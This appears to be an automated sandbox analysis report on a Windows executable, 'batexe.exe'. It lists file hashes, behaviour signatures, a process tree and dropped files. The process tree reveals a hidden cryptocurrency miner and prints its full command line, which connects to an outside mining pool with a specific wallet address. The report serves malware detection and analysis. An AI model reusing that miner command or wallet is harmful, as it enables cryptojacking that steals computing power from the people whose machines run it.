Analysis

  • max time kernel
    293s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    17/02/2024, 15:50

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\62A2.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2776

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe

          Filesize

          24.2MB

          MD5

          2f46ea24015f8e64400279896515a672

          SHA1

          7046330018561b3f03f4e07217015eaa1c9c0596

          SHA256

          1b7357858b49808a9318094f150df0a8e345de0e460185481d744d4711e5da4d

          SHA512

          a6cc895d5341c452a5d4ce27999ad8e2ddc8054d77cb587e588c8389c478fbf9ce2abab82bc556e9454ccd8d8685c6e7ec5333b983ae1986fd16ba9798032bb8

        • C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe

          Filesize

          12.1MB

          MD5

          b3c45365ae7a2bfe1c81480880517534

          SHA1

          32da7e4dc34693c2aebe88c7ee984b3fe5ee1e56

          SHA256

          4945a34c0862bcdc8dcd35525c3125b050067daf9fddb7f9729bd98cdf697b3e

          SHA512

          027fdcbdf44c5b549531a0dbef35a621aa266a1ba37d544a52ea7428a5535c0f90b824059ec9285b4c300d3b5de8bd0de6847cf2d911de85280f891d71ca5d92

        • C:\Users\Admin\AppData\Local\Temp\5F66.tmp\b2e.exe

          Filesize

          11.2MB

          MD5

          e9c7ee7ac5c6e451c0295ad8c60ce1dd

          SHA1

          4362f0c97c1d519b8760f0c6e70a2b2ed15fdc3a

          SHA256

          e35ec902f5c08414994ee871f5eeb529c195dfa8b3929d9b152e4698362e9f92

          SHA512

          ffa3ae5e0e384857e8b3e88eb640471d73a3a973676a4ccc729b5d7253da3e1c866c4ef4d22b46e2f396221e7b6eda5960abae54f52a1abf5faa1648c7b7a00a

        • C:\Users\Admin\AppData\Local\Temp\62A2.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          2.3MB

          MD5

          4c04147c386ba8792ac6a03069572a8a

          SHA1

          dda67789fc1d0f2469ca95f01a5c81034853ca6a

          SHA256

          c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

          SHA512

          a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          836KB

          MD5

          aeab40ed9a8e627ea7cefc1f5cf9bf7a

          SHA1

          5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

          SHA256

          218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

          SHA512

          c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          1.2MB

          MD5

          7cf672bee2afba2dcd0c031ff985958e

          SHA1

          6b82a205db080ffdcb4a4470fce85a14413f3217

          SHA256

          c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

          SHA512

          3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          6.7MB

          MD5

          cfd5315083bdd527b50204fe3a09edca

          SHA1

          2608003a6bc6a0deb3cf09f8a6cb05166d1163ba

          SHA256

          b521c136dc74c6c00b94ec1a83e69474eaa14a2c5b1ee2ce19c14dbb57338a83

          SHA512

          eee5bf1ce12e047f15c62d5547377bf372cc6c4aaea933b8dce0bcc4ebdd7732c640c73f49b8a00c981d924e6618e0ea7dc4675429351782b4181c5cd0ddbc0f

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          8.5MB

          MD5

          8d2608cfe1c41820d458769325f10f5a

          SHA1

          39a2bb40c8b82ee0e3d6d8eb2104a3c407b9132d

          SHA256

          b47e700853e7ec0318145cfa82533676dc2ac3378296c91b70cf2c3b5347de90

          SHA512

          c254869d4d045285e69b2095d02d3794bcf48895f89e7ee93a0f07c690108a0baa16f1d9925a2fd435ee123a168b589c710f2f208cca99db779440a43ceeef8f

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          8.2MB

          MD5

          a10dbb57d53cc533dba6dced0ae0775c

          SHA1

          41231ae0a44b7d7274b384a193a61b385f183d5c

          SHA256

          cd052dedb8db9b7dd3bb90fbb8057088eb470a4baf98268792fe38c04226c1dc

          SHA512

          3abdd517689a50cd2632e658a7ebf25159d85026e03994e8155be1292fe7f55dddb3ab7c1fd13ef434bc00c8ad6fe0666ba7d3d985e5e35ce15d798a2ba6b918

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/1164-9-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/1164-53-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/2136-8-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/2776-44-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/2776-59-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-46-0x0000000062FE0000-0x0000000063078000-memory.dmp

          Filesize

          608KB

        • memory/2776-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

          Filesize

          24.7MB

        • memory/2776-48-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-43-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-54-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-45-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/2776-64-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-69-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-74-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-79-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-84-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-94-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/2776-99-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB